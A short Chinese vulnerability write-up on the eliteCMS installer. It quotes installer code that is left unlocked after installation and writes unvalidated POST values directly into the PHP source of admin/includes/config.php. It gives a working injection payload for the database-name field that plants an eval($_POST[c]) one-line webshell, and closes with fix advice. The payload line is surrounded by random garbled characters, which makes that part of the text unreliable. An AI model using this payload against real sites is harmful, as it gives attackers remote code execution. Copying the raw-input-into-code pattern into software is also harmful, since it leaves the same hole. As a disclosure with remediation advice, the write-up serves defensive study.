eliteCMS的安装程序在安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装。
另外一个漏洞是安装程序可以直接写入一句话到 admin/includes/config.php。
我们来看代码:
...
elseif ($_GET['step'] == "4") {
$file = "../admin/includes/config.php";
$write = "<?php\n";
$write .= "/**\n";
$write .= "*\n";
$write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
$write .= "*\n";
$write .= "*/\n";
$write .= "\n";
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
$write .= "if (!\$connection) {\n";
$write .= " die(\"Database connection failed\" .mysql_error());\n";
$write .= " \n";
$write .= "} \n";
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
$write .= "if (!\$db_select) {\n";
$write .= " die(\"Database select failed\" .mysql_error());\n";
$write .= " \n";
$write .= "} \n";
$write .= "?>\n";
$writer = fopen($file, 'w');
...

再看代码:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

取值未作任何验证或转义，便直接拼接进生成的 PHP 源码并写入文件。
如果将数据库名的 POST 数据设为:
5 ~1 H) h8 d g5 i# r"?><?php eval($_POST[c]);?><?php+ Y6 b d- Y8 _, l8 Z0 A7 r
将导致一句话后门写入 /admin/includes/config.php。修复上需在安装完成后删除或锁定安装程序，并对写入配置文件的每个值做白名单校验或转义，而不是原样拼接进 PHP 源码。
|